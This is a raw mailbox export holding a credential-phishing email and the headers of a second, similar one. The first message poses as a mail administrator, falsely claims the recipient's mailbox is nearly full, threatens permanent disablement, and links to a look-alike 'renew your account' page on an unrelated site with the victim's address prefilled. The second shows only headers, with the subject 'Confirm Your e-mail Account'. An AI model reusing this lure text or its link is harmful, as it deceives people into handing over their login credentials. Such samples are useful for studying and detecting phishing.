From: "Mail System Administrator" <emailupdater@administrators.com>
Date: Mon, 23 Nov 2015 00:31:24 +0100
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - host3.technobd.biz
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - administrators.com
X-Get-Message-Sender-Via: host3.technobd.biz: authenticated_id: dutta@spidernetctg.com
X-Authenticated-Sender: host3.technobd.biz: dutta@spidernetctg.com
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 257

You will not see this in a MIME-aware mail reader.
--===============0434073412==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear jose@monkey.org


 =

   1969MB	  	  	 2000MB
 We noticed your e-mail account has almost exceed it's limit. And you may n=
ot be able to send or receive messages any moment from now, Click Here to r=
enew your account.    NOTICE:  failure to renew your e-mail account. It wil=
l be permanently disabled.   Thanks, Account Service
--===============0434073412==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><SPAN style=3D"WIDOWS: 1; TEXT-TRANSFORM: none=
; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !im=
portant; FONT: 12px arial, sans-serif; WHITE-SPACE: normal; FLOAT: none; LE=
TTER-SPACING: normal; COLOR: rgb(34,34,34); WORD-SPACING: 0px; -webkit-text=
-stroke-width: 0px">Dear<SPAN class=3DApple-converted-space>&nbsp;</SPAN></=
SPAN><A style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255=
,255,255); TEXT-INDENT: 0px; FONT: 12px arial, sans-serif; WHITE-SPACE: nor=
mal; LETTER-SPACING: normal; COLOR: rgb(17,85,204); WORD-SPACING: 0px; -web=
kit-text-stroke-width: 0px" href=3D"http://www.mistyhighlands.org/razio/ind=
ex/index.php?email=3Djose@monkey.org" target=3D_blank>jose@monkey.org</A><B=
R style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,2=
55); TEXT-INDENT: 0px; FONT: 12px arial, sans-serif; WHITE-SPACE: normal; L=
ETTER-SPACING: normal; COLOR: rgb(34,34,34); WORD-SPACING: 0px; -webkit-tex=
t-stroke-width: 0px"><BR style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROU=
ND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; FONT: 12px arial, sans-serif;=
 WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(34,34,34); WORD-SP=
ACING: 0px; -webkit-text-stroke-width: 0px"><BR style=3D"WIDOWS: 1; TEXT-TR=
ANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; FONT: =
12px arial, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR:=
 rgb(34,34,34); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">
<TABLE style=3D"BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; WIDOWS: 1; TEXT-TRANS=
FORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; BORDER-SP=
ACING: 0px; BORDER-COLLAPSE: collapse; BACKGROUND-REPEAT: repeat; FONT: 24p=
x 'Helvetica Neue', Helvetica, Arial, sans-serif; MAX-WIDTH: 100%; WHITE-SP=
ACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,68,68); BORDER-TOP: 0px;=
 BORDER-RIGHT: 0px; WORD-SPACING: 0px; -webkit-text-stroke-width: 0px" bord=
er=3D0 cellSpacing=3D0 cellPadding=3D0>
<TBODY style=3D"LINE-HEIGHT: 21px; WIDTH: 293px">
<TR style=3D"LINE-HEIGHT: 1.4em">
<TD style=3D"BORDER-BOTTOM: black 1pt solid; BORDER-LEFT: black 1pt solid; =
PADDING-BOTTOM: 0in; LINE-HEIGHT: 1.4em; BACKGROUND-COLOR: rgb(255,204,0); =
MARGIN: 0px; PADDING-LEFT: 0in; WIDTH: 131.25pt; PADDING-RIGHT: 0in; BACKGR=
OUND-REPEAT: repeat; FONT-FAMILY: arial, sans-serif; BORDER-RIGHT-COLOR: rg=
b(240,240,240); BORDER-TOP: black 1pt solid; PADDING-TOP: 0in" width=3D175>=
<SPAN style=3D"LINE-HEIGHT: 22px; FONT-FAMILY: Tahoma, sans-serif; COLOR: r=
gb(34,34,34); FONT-SIZE: 12pt">1969MB</SPAN><SPAN style=3D"LINE-HEIGHT: 22p=
x; COLOR: rgb(34,34,34); FONT-SIZE: 12pt"></SPAN></TD>
<TD style=3D"BORDER-BOTTOM: black 1pt solid; PADDING-BOTTOM: 0in; LINE-HEIG=
HT: 1.4em; BACKGROUND-COLOR: transparent; MARGIN: 0px; PADDING-LEFT: 0in; W=
IDTH: 18.75pt; PADDING-RIGHT: 0in; FONT-FAMILY: arial, sans-serif; BORDER-L=
EFT-COLOR: rgb(240,240,240); BORDER-TOP: black 1pt solid; BORDER-RIGHT: bla=
ck 1pt solid; PADDING-TOP: 0in" width=3D25><SPAN style=3D"LINE-HEIGHT: 22px=
; COLOR: rgb(34,34,34); FONT-SIZE: 12pt"></SPAN>&nbsp;</TD>
<TD style=3D"BORDER-BOTTOM-STYLE: none; BORDER-BOTTOM-COLOR: rgb(240,240,24=
0); PADDING-BOTTOM: 0in; LINE-HEIGHT: 1.4em; BORDER-RIGHT-STYLE: none; BACK=
GROUND-COLOR: transparent; BORDER-TOP-COLOR: rgb(240,240,240); MARGIN: 0px;=
 PADDING-LEFT: 0in; PADDING-RIGHT: 0in; BACKGROUND-REPEAT: repeat; FONT-FAM=
ILY: arial, sans-serif; BORDER-TOP-STYLE: none; BORDER-RIGHT-COLOR: rgb(240=
,240,240); BORDER-LEFT-STYLE: none; BORDER-LEFT-COLOR: rgb(240,240,240); PA=
DDING-TOP: 0in" vAlign=3Dtop>&nbsp;</TD>
<TD style=3D"BORDER-BOTTOM-STYLE: none; BORDER-BOTTOM-COLOR: rgb(240,240,24=
0); PADDING-BOTTOM: 0in; LINE-HEIGHT: 1.4em; BORDER-RIGHT-STYLE: none; BACK=
GROUND-COLOR: transparent; BORDER-TOP-COLOR: rgb(240,240,240); MARGIN: 0px;=
 PADDING-LEFT: 0in; PADDING-RIGHT: 0in; BACKGROUND-REPEAT: repeat; FONT-FAM=
ILY: arial, sans-serif; BORDER-TOP-STYLE: none; BORDER-RIGHT-COLOR: rgb(240=
,240,240); BORDER-LEFT-STYLE: none; BORDER-LEFT-COLOR: rgb(240,240,240); PA=
DDING-TOP: 0in"><B style=3D"LINE-HEIGHT: 1.4em"><SPAN style=3D"LINE-HEIGHT:=
 22px; FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(34,34,34); FONT-SIZE: 12=
pt">2000</SPAN></B><SPAN style=3D"LINE-HEIGHT: 22px; FONT-FAMILY: Tahoma, s=
ans-serif; COLOR: rgb(34,34,34); FONT-SIZE: 12pt">MB</SPAN><SPAN style=3D"L=
INE-HEIGHT: 22px; COLOR: rgb(34,34,34); FONT-SIZE: 12pt"></SPAN></TD></TR><=
/TBODY></TABLE>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 22px; FONT-SIZE: 12pt"><FONT style=3D"LINE-HEIGHT: 1.4em" color=
=3D#4d4d4d>We noticed your e-mail account has almost exceed it's limit.&nbs=
p;</FONT></SPAN><FONT style=3D"LINE-HEIGHT: 1.4em" color=3D#4d4d4d size=3D3=
><SPAN style=3D"LINE-HEIGHT: 1.4em">And you may not be able to send or rece=
ive messages any moment from now,</SPAN></FONT></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 1.4em"><A style=3D"LINE-HEIGHT: 1.4em; BACKGROUND-COLOR: transp=
arent; BACKGROUND-REPEAT: repeat; COLOR: rgb(34,34,34)" href=3D"http://www.=
mistyhighlands.org/razio/index/index.php?email=3Djose@monkey.org" target=3D=
_blank><SPAN style=3D"LINE-HEIGHT: 1.4em; COLOR: rgb(0,104,207)"><FONT styl=
e=3D"LINE-HEIGHT: 1.4em" color=3D#4d4d4d size=3D3>Click Here to&nbsp;renew =
your account.</FONT></SPAN></A><FONT style=3D"LINE-HEIGHT: 1.4em" color=3D#=
4d4d4d size=3D3>&nbsp;</FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 1.4em"></SPAN>&nbsp;</DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 1.4em"><FONT style=3D"LINE-HEIGHT: 1.4em" color=3D#4d4d4d size=
=3D3><B style=3D"LINE-HEIGHT: 1.4em"><U style=3D"LINE-HEIGHT: 1.4em">NOTICE=
:</U>&nbsp;</B></FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 1.4em"><FONT style=3D"LINE-HEIGHT: 1.4em" color=3D#4d4d4d size=
=3D3>failure to renew your e-mail account. It&nbsp;will be permanently disa=
bled.</FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 1.4em"></SPAN>&nbsp;</DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 22px; FONT-SIZE: 12pt"><FONT style=3D"LINE-HEIGHT: 1.4em" color=
=3D#4d4d4d>Thanks,</FONT></SPAN></DIV>
<DIV style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; FONT: 24px/1.4em 'Helvetica Neue', Helvetica, Ari=
al, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR: rgb(68,=
68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px"><SPAN style=3D"L=
INE-HEIGHT: 22px; FONT-SIZE: 12pt"><FONT style=3D"LINE-HEIGHT: 1.4em" color=
=3D#4d4d4d>Account Service</FONT></SPAN></DIV></BODY></HTML>
--===============0434073412==--

From jose@monkey.org Mon Nov 23 04:51:03 2015 +0000
Return-Path: test@bendida.lt
Delivered-To: jose@monkey.org
X-FDA: 70884640806.08.need62_26419ab4a0325
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 73,5,0,9265b5d8da751872,d41d8cd98f00b204,test@bendida.lt,:,RULES_HIT:41:72:379:800:962:967:969:973:982:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1394:1395:1431:1436:1437:1516:1517:1518:1534:1539:1561:1575:1588:1589:1592:1594:1711:1714:1730:1749:1777:1792:2107:2198:2199:2525:2527:2539:2560:2563:2682:2685:2731:2859:2890:2900:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3865:3867:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4552:5007:6261:6678:6688:7628:8518:9025:9388:9416:9873:9908:10004:10049:10346:10400:11480:11658:11914:12043:12076:12077:12295:12517:12519:12660:13199:13229:13235:13237:13846:13868:21080:30001:30016:30021:30022:30026:30046:30054,0,RBL:31.193.192.155:@bendida.lt:.lbl8.mailshell.net-62.8.255.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:73,LUA_SUMMARY:none
X-HE-Tag: need62_26419ab4a0325
X-Filterd-Recvd-Size: 2295
Received: from bendida.lt (bendida.lt [31.193.192.155])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 23 Nov 2015 04:51:02 +0000 (UTC)
X-No-Relay: not in my network
Received: from PATFORDSSERVER.patfords.local (adsl-65-8-137-139.mia.bellsouth.net [65.8.137.139])
	by bendida.lt (Postfix) with ESMTPA id 6E312988376
	for <jose@monkey.org>; Mon, 23 Nov 2015 06:24:38 +0200 (EET)
Content-Type: multipart/alternative; boundary="===============2101438520=="
MIME-Version: 1.0
Subject: Confirm Your e-mail Account ( jose@monkey.org )
To: jose@monkey.org
